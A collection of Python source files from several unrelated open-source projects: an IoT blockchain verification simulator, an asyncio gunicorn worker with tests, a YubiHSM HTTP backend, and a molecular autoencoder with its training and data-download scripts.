# Generate a globally unique address for this node
node_identifier = str(uuid4()).replace('-', '')
# Instantiate the Blockchain
blockchain = Blockchain()
def _getLogger(_logName, _logDir, _logSize=500*1024, _logCount=4):
if not os.path.exists(_logDir):
os.makedirs(_logDir)
_logfile = '%s/%s.log' % (_logDir, _logName)
_logLevel = logging.INFO
_logger = logging.getLogger(_logName)
_logger.setLevel(_logLevel)
if _logger.handlers is not None and len(_logger.handlers) >= 0:
for handler in _logger.handlers:
_logger.removeHandler(handler)
_logger.handlers = []
_loghandler = logging.handlers.RotatingFileHandler(_logfile, maxBytes=_logSize, backupCount=_logCount)
_formatter = logging.Formatter('[%(asctime)s] %(message)s')
_loghandler.setFormatter(_formatter)
_logger.addHandler(_loghandler)
return _logger
logger = _getLogger('trader', './log')
@app.route('/connect', methods=['POST'])
def connect_device():
# send connection result to IoT device
logger.info("\t /connect/device")
values = request.get_json()
# Check that the required fields are in the POST'ed data
required = ['ip', 'port', 'UUID']
if not all(k in values for k in required):
return 'Missing values', 400
device_uuid = values.get('UUID')
response = {
'your_UUID': device_uuid,
}
return jsonify(response), 201
@app.route('/information/you', methods=['GET'])
def send_information():
# Send this Trader`s information
logger.info("\t /information/you")
response = {
'trader_address': node_identifier,
}
return jsonify(response), 200
@app.route('/address/device', methods=['GET'])
def make_address():
# Generate and send random identifier(UUID) for IoT devices.
# This API is for simulations ONLY!!!!
logger.info("\t /address/device")
identifier = str(uuid4())
response = {
'identifier': identifier,
}
return jsonify(response), 200
@app.route('/dump', methods=['GET'])
def save_blockchain():
# save blockchain into file
logger.info("\t /dump Palatte")
if not os.path.exists('./palatte'):
os.makedirs('./palatte')
date = datetime.today().strftime("%Y%m%d%H%M")
file = open("./palatte/ChainVeri-" + date, 'w')
file.write("ChainVeri Blockchain " + date + "\n")
file.write(json.dumps(blockchain.chain, indent='\t'))
file.close()
# print blockchain data to client
response = {
'message': "Blockchain Saved",
'index': len(blockchain.chain),
}
return jsonify(response), 200
@app.route('/mine/<int:num>', methods=['GET'])
def mine_repeat(num):
logger.info("\t /mine %d times" % num)
start_time = datetime.now()
tmp = 0
while tmp <= num:
#blockchain.new_verification(values['sender'], values['model'], values['firmware'], values['version'])
blockchain.new_verification('3767bef4-0ca6-40e3-b228-79cef1544311', 'IoT_Device', '1a3d2d32ada795e5df47293745a7479bcb3e4e29d8ee1eaa114350b691cf38d3', 'ubuntu-17.10.1-desktop-amd64')
mine()
tmp = tmp + 1
end_time = datetime.now()
delta = str(end_time - start_time)
response = {
'repeat': num,
'start_time': start_time,
'end_time': end_time,
'delta': delta
}
return jsonify(response), 200
@app.route('/mine', methods=['GET'])
def mine():
# We run the proof of work algorithm to get the next proof...
logger.info("\t /mine")
last_block = blockchain.last_block
proof = blockchain.proof_of_work(last_block)
# Forge the new Block by adding it to the chain
previous_hash = blockchain.hash(last_block)
block = blockchain.new_block(proof, previous_hash)
response = {
'message': "New Block Forged",
'index': block['index'],
'transactions': block['transactions'],
'proof': block['proof'],
'previous_hash': block['previous_hash'],
}
return jsonify(response), 200
def requst_device_vinfo(_ip, _port):
logger.info("request vinfo to %s:%s" % (_ip, _port) )
_url = "http://" + _ip + ":" + str(_port) + "/verification/device"
data = {
'sender': "",
'model': "",
'firmware': "",
'version': "",
}
response = requests.post(_url, json=data)
return response
@app.route('/verification/new', methods=['POST'])
def new_verification():
logger.info("\t /transaction/new")
values = request.get_json()
# Check that the required fields are in the POST'ed data
required = ['sender', 'model', 'firmware', 'version', 'ip', 'port']
if not all(k in values for k in required):
return 'Missing values', 400
# request given device v-info from ip,port
response_from_deivce = requst_device_vinfo(values.get('ip'), values.get('port'))
receved_vinfo = response_from_deivce.json()
_sender = receved_vinfo.get('sender')
_model = receved_vinfo.get('model')
_firmware = receved_vinfo.get('firmware')
_version = receved_vinfo.get('version')
response_fail = {'message': f'Transaction failed'}
if not eq(values['sender'], receved_vinfo['sender']):
response_fail = {'message': f'verification failed, check sender field'}
return jsonify(response_fail), 201
if not eq(values['model'], receved_vinfo['model']):
response_fail = {'message': f'verification failed, check model field'}
return jsonify(response_fail), 201
if not eq(values['firmware'], receved_vinfo['firmware']):
response_fail = {'message': f'verification failed, check firmware field'}
return jsonify(response_fail), 201
if not eq(values['version'], receved_vinfo['version']):
response_fail = {'message': f'verification failed, check version field'}
return jsonify(response_fail), 201
# Create a new Transaction
blockchain.new_verification(values['sender'], values['model'], values['firmware'], values['version'])
response = {'message': f'verification will be added to Block'}
mine()
return jsonify(response), 201
@app.route('/chain', methods=['GET'])
def full_chain():
logger.info("\t /chain")
response = {
'length': len(blockchain.chain),
'chain': blockchain.chain,
}
return jsonify(response), 200
@app.route('/nodes/register', methods=['POST'])
def register_nodes():
logger.info("\t /nodes/register")
values = request.get_json()
nodes = values.get('nodes')
if nodes is None:
return "Error: Please supply a valid list of nodes", 400
for node in nodes:
blockchain.register_node(node)
response = {
'message': 'New nodes have been added',
'total_nodes': list(blockchain.nodes),
}
return jsonify(response), 201
@app.route('/nodes/resolve', methods=['GET'])
def consensus():
logger.info("\t /nodes/resolve")
start_time = datetime.now()
replaced = blockchain.resolve_conflicts()
end_time = datetime.now()
delta = str(end_time - start_time)
if replaced:
response = {
'start_time': start_time,
'end_time': end_time,
'delta': delta,
'message': 'Our chain was replaced',
'new_chain': blockchain.chain
}
else:
response = {
'start_time': start_time,
'end_time': end_time,
'delta': delta,
'message': 'Our chain is authoritative',
'chain': blockchain.chain
}
return jsonify(response), 200
if __name__ == '__main__':
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument('-p', '--port', default=5000, type=int, help='port to listen on')
args = parser.parse_args()
port = args.port
logger.info("Start trader: listen %s:%s" % ('0.0.0.0', port))
app.run(host='0.0.0.0', port=port)
```
#### File: JeaMinLim/ChainVeri_Sim/IoT_device.py
```python
import json
import logging
import logging.handlers
import os
import requests
from uuid import uuid4
from flask import Flask, jsonify, request
from netifaces import interfaces, ifaddresses, AF_INET
class DeviceInfo:
def __init__(self):
self.model_name = []
self.firmware_version = []
self.firmware_hash = []
self.UUID = []
self.trader_ip = []
self.trader_port = []
self.device_ip = []
self.device_port = []
# get IoT device`s IP address
_iface = interfaces()
_iface.remove(u'lo')
_iface = ', '.join(_iface)
_tmp = [i['addr'] for i in ifaddresses(_iface).setdefault(AF_INET, [{'addr': 'No IP addr'}])]
self.device_ip = ', '.join(_tmp)
# create UUID for IoT device
# self.UUID = str(uuid4())
self.resDevice_ip = []
self.resDevice_port = []
self.resUUID = []
self.vinfo = {'sender': [], 'model': [], 'firmware': [], 'version': []}
def _getLogger(_logName, _logDir, _logSize=500 * 1024, _logCount=4):
if not os.path.exists(_logDir):
os.makedirs(_logDir)
_logfile = '%s/%s.log' % (_logDir, _logName)
_logLevel = logging.INFO
_logger = logging.getLogger(_logName)
_logger.setLevel(_logLevel)
if _logger.handlers is not None and len(_logger.handlers) >= 0:
for handler in _logger.handlers:
_logger.removeHandler(handler)
_logger.handlers = []
_loghandler = logging.handlers.RotatingFileHandler(_logfile, maxBytes=_logSize, backupCount=_logCount)
_formatter = logging.Formatter('[%(asctime)s] %(message)s')
_loghandler.setFormatter(_formatter)
_logger.addHandler(_loghandler)
return _logger
logPrefix = "1ST"
logger = _getLogger('IoTdevice', './log')
device = DeviceInfo()
app = Flask(__name__)
app.route('/verification/result', methods=['POST'])
def verification_resutl():
return
@app.route('/verification/device', methods=['POST'])
def exchange_vinfo():
# init verification
logger.info("exchange vinfo")
values = request.get_json()
# Firmware data is essential
required = ['sender', 'model', 'firmware', 'version']
if not all(k in values for k in required):
return 'Missing values', 400
# save recived vinfo
device.vinfo['sender'] = values.get('sender')
device.vinfo['model'] = values.get('model')
device.vinfo['firmware'] = values.get('firmware')
device.vinfo['version'] = values.get('version')
data = {
'sender': device.UUID,
'model': device.model_name,
'firmware': device.firmware_hash,
'version': device.firmware_version,
}
return jsonify(data), 201
@app.route('/verification/info', methods=['GET'])
def verification_info():
# trigger verification process
# caller should be REST API client(POSTMAN, cURL eta)
logger.info("verification")
# exchange V-INFO(Verification-related information)
response = {
'trader': {
'ip': device.trader_ip,
'port': device.trader_port
},
'requester': {
'ip': device.device_ip,
'port': device.device_port
},
'responder': {
'ip': device.resDevice_ip,
'port': device.resDevice_port,
},
'v-info': {
'sender': device.vinfo['sender'],
'model': device.vinfo['model'],
'firmware': device.vinfo['firmware'],
'version': device.vinfo['version'],
}
}
return jsonify(response), 201
@app.route('/connect', methods=['POST'])
def connect_device():
# send connection result to IoT device
values = request.get_json()
# Check that the required fields are in the POST'ed data
required = ['ip', 'port', 'UUID']
if not all(k in values for k in required):
return 'Missing values', 400
device.resDevice_ip = values.get('ip')
device.resDevice_port = values.get('port')
device.resUUID = values.get('UUID')
response = {
'message': 'connection established',
'ip': device.device_ip,
'port': device.device_port,
'UUID': device.UUID,
}
return jsonify(response), 201
def connect_to_device(self, _ip, _port):
logger.info("Connection check to %s:%s" % (_ip, _port) )
_url = "http://" + _ip + ":" + str(_port) + "/connect"
_data = {
'ip': device.device_ip,
'port': device.device_port,
'UUID': device.UUID,
}
response = requests.post(_url, json=_data)
return response
def triggerVerification(self, _IP, _PORT):
logger.info("send V-INFO to the other IoT device")
_url = "http://" + _IP + ":" + _PORT + "/connect/device"
vinfo = {
'ip': device.device_ip,
'port': device.device_port,
'UUID': device.UUID,
}
logger.info("send V-INFO to the other IoT device")
response = requests.post(_url, json=vinfo)
logger.info("send V-INFO to the other IoT device")
if response.ok:
values = request.get_json()
required = ['ip', 'port', 'UUID']
if not all(k in values for k in required):
return 'Missing values', 400
logger.info("send V-INFO to the other IoT device")
device.resDevice_ip = values.get('ip')
device.resDevice_port = values.get('port')
device.resUUID = values.get('UUID')
logger.info("\t V-INFO: revices V-NFO")
logger.info("\t V-INFO: ip \tport \tUUID")
logger.info("\t\t: %s, %s, $%s " % (device.resDevice_ip, device.resDevice_port, device.resDevice_UUID))
else:
logger.info("can not find other IoT device")
def log_device_info():
# print current device Info
logger.info("IoT node information: %s" % logPrefix)
logger.info("\t MODEL: " + device.model_name)
logger.info("\t SENDER(IoT device) UUID: " + device.UUID)
logger.info("\t FIRMWARE HASH: " + device.firmware_hash)
logger.info("\t FIRMWARE VERSION:" + device.firmware_version)
logger.info("\t IP address: " + device.device_ip)
if __name__ == '__main__':
from argparse import ArgumentParser
parser = ArgumentParser()
# set default config
# firmware
parser.add_argument('-tip', '--tip', help='Trader`s ip address ', default='127.0.0.1')
parser.add_argument('-tp', '--tport', help='Trader`s port number', default=5000, type=int)
parser.add_argument('-m', '--model', default='IoT_device', help='IoT device model name')
parser.add_argument('-s', '--sender', help='UUID of IoT_Device', default='3767bef4-0ca6-40e3-b228-79cef1544311')
parser.add_argument('-f', '--firmware_hash', help='Hash value of firmware',
default='2b93836c38833b26891345388ff5ddea60529b27a616b4539d432a3520d1c90b')
parser.add_argument('-v', '--version', help='firmware version in string', default='Fedora-Server-netinst-x86_64-27-1.6')
parser.add_argument('-ip', '--ip', help='This device IP', default='127.0.0.1')
parser.add_argument('-p', '--port', help='This device port number', default=5100, type=int)
args = parser.parse_args()
device.UUID = args.sender
device.trader_ip = args.tip
device.trader_port = args.tport
device.model_name = args.model
device.device_port = args.port
device.firmware_hash = args.firmware_hash
device.firmware_version = args.version
logger.info("Connection test with Trader")
response = connect_to_device(device, device.trader_ip, device.trader_port)
if response.ok:
try:
logPrefix = "1ST"
app.run(host='0.0.0.0', port=device.device_port)
logger.info("Start IoT device %s: listen %s:%s" % (logPrefix, '0.0.0.0', device.device_port))
log_device_info()
except:
print("You are not the first device")
device.device_port = device.device_port + 1
logger.info("Connection test with First IoT device")
device.resDevice_ip = '127.0.0.01'
device.resDevice_port = 5100
response = connect_to_device(device, device.device_ip, device.trader_port)
app.run(host='0.0.0.0', port=device.device_port)
logPrefix = '2ND:'
logger.info("Start IoT device %s: listen %s:%s" % (logPrefix, '0.0.0.0', device.device_port))
log_device_info()
else:
print("connection test fail")
```
|
{
"source": "jeamland/guvnor",
"score": 2
}
|
#### File: guvnor/guvnor/asyncio_worker.py
```python
import asyncio
import io
from itertools import count
import os
import urllib.parse
from wsgiref.handlers import format_date_time
from gunicorn.http.wsgi import base_environ
from gunicorn.workers.base import Worker
import h11
def environ_from_request(cfg, req, sockname, body):
target = req.target
fragment = None
query = None
target = urllib.parse.unquote_to_bytes(target)
if b'#' in target:
target, fragment = target.split(b'#', 1)
if b'?' in target:
print(repr(target))
target, query = target.split(b'?', 1)
environ = base_environ(cfg)
environ.update({
'PATH_INFO': target.decode('utf8'),
'QUERY_STRING': query.decode('utf8') if query else '',
'REQUEST_METHOD': req.method.decode('ascii'),
'SCRIPT_NAME': os.environ.get('SCRIPT_NAME', ''),
'SERVER_NAME': sockname[0],
'SERVER_PORT': str(sockname[1]),
'SERVER_PROTOCOL': 'HTTP/%s' % req.http_version.decode('ascii'),
'wsgi.input': io.BytesIO(body),
'wsgi.url_scheme': 'https' if cfg.is_ssl else 'http',
})
for k, v in req.headers:
print(repr(k), repr(v))
if k == b'host':
environ['HOST'] = v.decode('ascii')
key = 'HTTP_' + k.decode('ascii').upper().replace('-', '_')
if key in environ:
v = "%s,%s" % (environ[key], v.decode('ascii'))
environ[key] = v.decode('ascii')
return environ
class WSGIResponse:
def __init__(self, http, app, environ):
self.http = http
self.app = app
self.environ = environ
self.status = None
self.reason = None
self.headers = []
self.exc_info = None
self.buffer = []
async def process_request(self):
result = self.app(self.environ, self.start_response)
if result is not None:
self.buffer.extend(result)
res = h11.Response(
status_code=self.status,
reason=self.reason,
headers=self.headers,
)
await self.http.send(res)
for data in self.buffer:
await self.http.send(h11.Data(data=data))
await self.http.send(h11.EndOfMessage())
def start_response(self, status, headers, exc_info=None):
status, reason = status.split(' ', 1)
self.status = int(status)
self.reason = reason
self.exc_info = exc_info
self.headers.extend(headers)
return lambda data: self.buffer.append(data)
class HTTPConnection:
_next_id = count()
def __init__(self, reader, writer):
self.reader = reader
self.writer = writer
self.conn = h11.Connection(h11.SERVER)
# Our Server: header
self.ident = " ".join([
"h11-example-curio-server/{}".format(h11.__version__),
h11.PRODUCT_ID,
]).encode("ascii")
# A unique id for this connection, to include in debugging output
# (useful for understanding what's going on if there are multiple
# simultaneous clients).
self._obj_id = next(HTTPConnection._next_id)
async def send(self, event):
# The code below doesn't send ConnectionClosed, so we don't bother
# handling it here either -- it would require that we do something
# appropriate when 'data' is None.
assert type(event) is not h11.ConnectionClosed
data = self.conn.send(event)
self.writer.write(data)
await self.writer.drain()
async def _read_from_peer(self):
if self.conn.they_are_waiting_for_100_continue:
self.info("Sending 100 Continue")
go_ahead = h11.InformationalResponse(
status_code=100,
headers=self.basic_headers())
await self.send(go_ahead)
try:
data = await self.reader.read()
except ConnectionError:
# They've stopped listening. Not much we can do about it here.
data = b""
self.conn.receive_data(data)
async def next_event(self):
while True:
event = self.conn.next_event()
if event is h11.NEED_DATA:
await self._read_from_peer()
continue
return event
def basic_headers(self):
# HTTP requires these headers in all responses (client would do
# something different here)
return [
("Date", format_date_time(None).encode("ascii")),
("Server", self.ident),
]
def info(self, *args):
# Little debugging method
print("{}:".format(self._obj_id), *args)
class AsyncioWorker(Worker):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.servers = []
self.sockname = None
def run(self):
loop = asyncio.get_event_loop()
loop.create_task(self.create_servers())
loop.run_forever()
def cleanup(self):
self.tmp.close()
async def create_servers(self):
for sock in self.sockets:
print(repr(sock))
def task_factory(sock):
sockname = sock.getsockname()
async def _inner(reader, writer):
await self.connection_task(sockname, reader, writer)
return _inner
server = await asyncio.start_server(task_factory(sock), sock=sock)
self.servers.append(server)
async def maybe_send_error_response(self, http, exc):
# If we can't send an error, oh well, nothing to be done
http.info("trying to send error response...")
if http.conn.our_state not in {h11.IDLE, h11.SEND_RESPONSE}:
http.info("...but I can't, because our state is",
http.conn.our_state)
return
try:
if isinstance(exc, h11.RemoteProtocolError):
status_code = exc.error_status_hint
else:
status_code = 500
body = str(exc).encode("utf-8")
http.info("Sending", status_code,
"response with", len(body), "bytes")
headers = http.basic_headers()
headers.append(("Content-Type", "text/plain; charset=utf-8"))
headers.append(("Content-Length", str(len(body))))
res = h11.Response(status_code=status_code, headers=headers)
await http.send(res)
await http.send(h11.Data(data=body))
await http.send(h11.EndOfMessage())
except Exception as exc:
http.info("error while sending error response:", exc)
async def respond_to_request(self, http, req, sockname):
http.info("Preparing echo response")
body = b''
while True:
event = await http.next_event()
if type(event) is h11.EndOfMessage:
break
assert type(event) is h11.Data
body += event.data
environ = environ_from_request(self.cfg, req, sockname, body)
app = self.app.wsgi()
wsgi_response = WSGIResponse(http, app, environ)
await wsgi_response.process_request()
async def connection_task(self, sockname, reader, writer):
print(repr(sockname))
http = HTTPConnection(reader, writer)
while True:
assert http.conn.states == {
h11.CLIENT: h11.IDLE, h11.SERVER: h11.IDLE}
try:
http.info("Server main loop waiting for request")
event = await http.next_event()
http.info("Server main loop got event:", event)
if type(event) is h11.Request:
await self.respond_to_request(http, event, sockname)
except Exception as exc:
import traceback
traceback.print_exc()
http.info("Error during response handler:", exc)
await self.maybe_send_error_response(http, exc)
if http.conn.our_state is h11.MUST_CLOSE:
http.info("connection is not reusable, so shutting down")
await writer.drain()
writer.close()
return
else:
try:
http.info("trying to re-use connection")
http.conn.start_next_cycle()
except h11.ProtocolError:
states = http.conn.states
http.info("unexpected state", states, "-- bailing out")
await self.maybe_send_error_response(
http,
RuntimeError("unexpected state {}".format(states)))
await writer.drain()
writer.close()
return
```
#### File: guvnor/tests/test_asyncio_worker.py
```python
import asyncio
import os
from gunicorn.config import Config
from guvnor.asyncio_worker import AsyncioWorker
from .support import (WSGITestRunner, run_worker, setup_function,
teardown_function)
def test_worker_creates_servers_for_sockets(monkeypatch, mocker):
loop = asyncio.get_event_loop()
calls = []
age = None
ppid = os.getpid()
sockets = [mocker.MagicMock(), mocker.MagicMock()]
app = None
timeout = None
cfg = Config()
log = None
async def start_server(*args, **kwargs):
calls.append((args, kwargs))
if len(calls) == len(sockets):
loop.stop()
monkeypatch.setattr(asyncio, 'start_server', start_server)
worker = AsyncioWorker(age, ppid, sockets, app, timeout, cfg, log)
run_worker(worker)
for call in calls:
assert call[1]['sock'] in sockets
def test_worker_passes_request_to_app():
request = b'GET / HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\n\r\n'
runner = WSGITestRunner(request)
runner.run()
assert runner.wsgi.called
assert runner.wsgi.environ['REQUEST_METHOD'] == 'GET'
assert runner.wsgi.environ['SERVER_PROTOCOL'] == 'HTTP/1.1'
assert runner.wsgi.environ['HOST'] == 'localhost'
def test_worker_returns_response_to_socket():
request = b'GET / HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\n\r\n'
response_body = b'hello'
runner = WSGITestRunner(request, response_headers=[
('Content-Type', 'text/plain'),
], response_body=[response_body])
runner.run()
assert runner.wsgi.called
print(repr(runner.writer.data))
assert b'200' in runner.writer.data
assert response_body in runner.writer.data
```
#### File: guvnor/tests/test_wsgi_url_handling.py
```python
import asyncio
import os
import urllib.parse
from gunicorn.config import Config
from guvnor.asyncio_worker import AsyncioWorker
from .support import (WSGITestRunner, run_worker, setup_function,
teardown_function)
def encode_path(path):
path = path.encode('utf8')
path = urllib.parse.quote_from_bytes(path)
return path.encode('ascii')
def path_test(path):
req = b'GET %s HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\n\r\n'
runner = WSGITestRunner(req % path)
runner.run()
assert runner.wsgi.called
return runner
def test_basic_paths():
runner = path_test(encode_path('/'))
environ = runner.wsgi.environ
assert environ['PATH_INFO'] == '/'
assert environ['QUERY_STRING'] == ''
def test_simple_utf8_path():
expected_path = '/frobnitz™'
runner = path_test(encode_path(expected_path))
environ = runner.wsgi.environ
assert environ['PATH_INFO'] == expected_path
assert environ['QUERY_STRING'] == ''
def test_basic_query():
query = 'foo=bar&baz=qux'
runner = path_test(('/?' + query).encode('utf8'))
environ = runner.wsgi.environ
assert environ['QUERY_STRING'] == query
def test_basic_query():
query = 'foo=bar&baz=qux'
runner = path_test(encode_path('/?' + query))
environ = runner.wsgi.environ
assert environ['QUERY_STRING'] == query
def test_utf8_query():
query = 'foo=bar&baz=qux&utf8=✔'
runner = path_test(encode_path('/?' + query))
environ = runner.wsgi.environ
assert environ['QUERY_STRING'] == query
```
|
{
"source": "jeamland/python-yubihsm",
"score": 2
}
|
#### File: yubihsm/backends/http.py
```python
from __future__ import absolute_import
from ..exceptions import YubiHsmConnectionError
from requests.exceptions import RequestException
from six.moves.urllib import parse
import requests
class HttpBackend(object):
"""A backend for communicating with a YubiHSM connector over HTTP."""
def __init__(self, url='http://localhost:12345', timeout=None):
"""Constructs a new HttpBackend, connecting to the given URL.
The URL should be a http(s) URL to a running YubiHSM connector.
By default, the backend will attempt to connect to a connector running
locally, on the default port.
:param str url: (optional) The URL to connect to.
:param timeout: (optional) A timeout in seconds, or a tuple of two
values to use as connection timeout and request timeout.
:type timeout: int or tuple[int, int]
"""
self._url = parse.urljoin(url, '/connector/api')
self._timeout = timeout
self._session = requests.Session()
self._session.headers.update(
{'Content-Type': 'application/octet-stream'})
def transceive(self, msg):
"""Send a verbatim message."""
try:
resp = self._session.post(
url=self._url,
data=msg,
timeout=self._timeout
)
resp.raise_for_status()
return resp.content
except RequestException as e:
raise YubiHsmConnectionError(e)
def close(self):
self._session.close()
def __repr__(self):
return '{0.__class__.__name__}("{0._url}")'.format(self)
```
|
{
"source": "jeammimi/chem2",
"score": 2
}
|
#### File: jeammimi/chem2/sample_latent.py
```python
from __future__ import print_function
import argparse
import os, sys
import h5py
import numpy as np
from molecules.model import MoleculeVAE
from molecules.utils import one_hot_array, one_hot_index, from_one_hot_array, \
decode_smiles_from_indexes, load_dataset
from sklearn.manifold import TSNE
from sklearn.decomposition import PCA
from pylab import figure, axes, scatter, title, show
from rdkit import Chem
from rdkit.Chem import Draw
from keras.models import Sequential, Model, load_model
LATENT_DIM = 292
PCA_COMPONENTS = 50
TSNE_LEARNING_RATE = 750.0
TSNE_ITERATIONS = 1000
TSNE_COMPONENTS = 2
TSNE_PERPLEXITY = 30.0
def get_arguments():
parser = argparse.ArgumentParser(description='Molecular autoencoder network')
parser.add_argument('data', type=str, help='HDF5 file to read input data from.')
parser.add_argument('model', type=str, help='Trained Keras model to use.')
parser.add_argument('--save_h5', type=str, help='Name of a file to write HDF5 output to.')
parser.add_argument('--latent_dim', type=int, metavar='N', default=LATENT_DIM,
help='Dimensionality of the latent representation.')
parser.add_argument('--tsne_lr', metavar='LR', type=float, default=TSNE_LEARNING_RATE,
help='Learning to use for t-SNE.')
parser.add_argument('--tsne_components', metavar='N', type=int, default=TSNE_COMPONENTS,
help='Number of components to use for t-SNE.')
parser.add_argument('--tsne_perplexity', metavar='P', type=float, default=TSNE_PERPLEXITY)
parser.add_argument('--tsne_iterations', metavar='N', type=int, default=TSNE_ITERATIONS)
parser.add_argument('--visualize', dest='visualize', action='store_true',
help='Fit manifold and render a visualization. If this flag is not used, the sampled data' +
' will simply be returned with no further processing.')
parser.add_argument('--skip-pca', dest='use_pca', action='store_false',
help='Skip PCA preprocessing of data to feed into t-SNE.')
parser.add_argument('--pca_components', metavar='N', type=int, default=PCA_COMPONENTS,
help='Number of components to use for PCA.')
parser.set_defaults(use_pca = True)
parser.set_defaults(visualize = False)
return parser.parse_args()
def visualize_latent_rep(args, model, x_latent):
print("pca_on=%r pca_comp=%d tsne_comp=%d tsne_perplexity=%f tsne_lr=%f" % (
args.use_pca,
args.pca_components,
args.tsne_components,
args.tsne_perplexity,
args.tsne_lr
))
if args.use_pca:
pca = PCA(n_components = args.pca_components)
x_latent = pca.fit_transform(x_latent)
figure(figsize=(6, 6))
scatter(x_latent[:, 0], x_latent[:, 1], marker='.')
show()
tsne = TSNE(n_components = args.tsne_components,
perplexity = args.tsne_perplexity,
learning_rate = args.tsne_lr,
n_iter = args.tsne_iterations,
verbose = 4)
x_latent_proj = tsne.fit_transform(x_latent)
del x_latent
figure(figsize=(6, 6))
scatter(x_latent_proj[:, 0], x_latent_proj[:, 1], marker='.')
show()
def main():
args = get_arguments()
model = MoleculeVAE()
data, data_test, charset = load_dataset(args.data)
if os.path.isfile(args.model):
model.load(charset, args.model, latent_rep_size = args.latent_dim)
else:
raise ValueError("Model file %s doesn't exist" % args.model)
x_latent = model.encoder.predict(data)
if not args.visualize:
if not args.save_h5:
np.savetxt(sys.stdout, x_latent, delimiter = '\t')
else:
h5f = h5py.File(args.save_h5, 'w')
h5f.create_dataset('charset', data = charset)
h5f.create_dataset('latent_vectors', data = x_latent)
h5f.close()
else:
visualize_latent_rep(args, model, x_latent)
if __name__ == '__main__':
main()
```
|
{
"source": "jeammimi/chem",
"score": 2
}
|
#### File: chem/autoencoder/model.py
```python
from keras import backend as K
from keras import objectives
from keras.models import Model
from keras.layers import Input, Dense, Lambda
from keras.layers.core import Dense, Activation, Flatten, RepeatVector
from keras.layers.wrappers import TimeDistributed
from keras.layers.recurrent import GRU
from keras.layers.convolutional import Convolution1D
class MoleculeVAE():
autoencoder = None
def create(self,
charset,
max_length = 120,
epsilon_std = 0.01,
latent_rep_size = 292,
weights_file = None):
charset_length = len(charset)
x = Input(shape=(max_length, charset_length))
h = Convolution1D(9, 9, activation = 'relu')(x)
h = Convolution1D(9, 9, activation = 'relu')(h)
h = Convolution1D(10, 11, activation = 'relu')(h)
h = Flatten()(h)
h = Dense(435, activation = 'relu')(h)
z_mean = Dense(latent_rep_size, name='z_mean', activation = 'linear')(h)
z_log_var = Dense(latent_rep_size, name='z_log_var', activation = 'linear')(h)
def sampling(args):
z_mean, z_log_var = args
batch_size = K.shape(z_mean)[0]
epsilon = K.random_normal(shape=(batch_size, latent_rep_size), mean=0., std=epsilon_std)
return z_mean + K.exp(z_log_var / 2) * epsilon
def output_shape(args):
ms,vs = args
return ms
z = Lambda(sampling,output_shape)([z_mean, z_log_var])
h = Dense(latent_rep_size, name='latent_input', activation = 'relu')(z)
h = RepeatVector(max_length)(h)
h = GRU(501, return_sequences = True)(h)
h = GRU(501, return_sequences = True)(h)
h = GRU(501, return_sequences = True)(h)
decoded_mean = TimeDistributed(Dense(charset_length, activation='softmax'), name='decoded_mean')(h)
def vae_loss(x, x_decoded_mean):
x = K.flatten(x)
x_decoded_mean = K.flatten(x_decoded_mean)
xent_loss = max_length * objectives.binary_crossentropy(x, x_decoded_mean)
kl_loss = - 0.5 * K.mean(1 + z_log_var - K.square(z_mean) - K.exp(z_log_var), axis = -1)
return xent_loss + kl_loss
encoded_input = Input(shape=(max_length, latent_rep_size))
self.autoencoder = Model(x, decoded_mean)
self.encoder = Model(x, z_mean)
#self.decoder = Model(self.autoencoder.get_layer('z_mean'),
# self.autoencoder.get_layer('decoded_mean')(encoded_input))
if weights_file:
self.autoencoder.load_weights(weights_file)
self.autoencoder.compile(optimizer = 'Adam',
loss = vae_loss,
metrics = ['accuracy'])
def save(self, filename):
self.autoencoder.save_weights(filename)
def load(self, charset, weights_file, latent_rep_size = 292):
self.create(charset, weights_file = weights_file, latent_rep_size = latent_rep_size)
```
#### File: jeammimi/chem/download_chembl.py
```python
import argparse
import gzip
import pandas
import tempfile
import urllib
DEFAULT_URI = 'ftp://ftp.ebi.ac.uk/pub/databases/chembl/ChEMBLdb/latest/chembl_22_chemreps.txt.gz'
def get_arguments():
parser = argparse.ArgumentParser(description='Download ChEMBL entries and convert them to input for preprocessing')
parser.add_argument('--uri', type=str, default=DEFAULT_URI,
help = 'URI to download ChEMBL entries from')
parser.add_argument('--outfile', type=str, help='Output file name', default = 'chembl_smiles.h5')
return parser.parse_args()
def main():
args = get_arguments()
tfile = tempfile.NamedTemporaryFile()
fname = tfile.name
urllib.urlretrieve(args.uri, fname)
f = gzip.GzipFile(fname)
d = {}
for line in f.readlines()[1:]:
s = line.split()
i = int(s[0][6:])
d[i] = s[1]
keys = d.keys()
keys.sort()
frame = pandas.DataFrame(dict(structure=[d[key] for key in keys]))
frame.to_hdf(args.outfile, 'table')
if __name__ == '__main__':
main()
```
#### File: jeammimi/chem/train.py
```python
from __future__ import print_function
import argparse
import os
import h5py
import numpy as np
from autoencoder.model import MoleculeVAE
from autoencoder.utils import one_hot_array, one_hot_index, from_one_hot_array, \
decode_smiles_from_indexes, load_dataset
from keras.callbacks import ModelCheckpoint, ReduceLROnPlateau
NUM_EPOCHS = 1
BATCH_SIZE = 600
LATENT_DIM = 292
def get_arguments():
parser = argparse.ArgumentParser(description='Molecular autoencoder network')
parser.add_argument('data', type=str, help='The HDF5 file containing preprocessed data.')
parser.add_argument('model', type=str,
help='Where to save the trained model. If this file exists, it will be opened and resumed.')
parser.add_argument('--epochs', type=int, metavar='N', default=NUM_EPOCHS,
help='Number of epochs to run during training.')
parser.add_argument('--latent_dim', type=int, metavar='N', default=LATENT_DIM,
help='Dimensionality of the latent representation.')
parser.add_argument('--batch_size', type=int, metavar='N', default=BATCH_SIZE,
help='Number of samples to process per minibatch during training.')
return parser.parse_args()
def train(network, data_train, data_test, epochs, batch_size, callbacks=[], shuffle = True):
network.fit(data_train, data_train,
shuffle = shuffle,
nb_epoch = epochs,
batch_size = batch_size,
callbacks = callbacks,
validation_data = (data_test, data_test))
def main():
args = get_arguments()
data_train, data_test, charset = load_dataset(args.data)
model = MoleculeVAE()
if os.path.isfile(args.model):
model.load(charset, args.model, latent_rep_size = args.latent_dim)
else:
model.create(charset, latent_rep_size = args.latent_dim)
checkpointer = ModelCheckpoint(filepath = args.model,
verbose = 1,
save_best_only = True)
reduce_lr = ReduceLROnPlateau(monitor = 'val_loss',
factor = 0.2,
patience = 3,
min_lr = 0.0001)
train(model.autoencoder,
data_train,
data_test,
args.epochs,
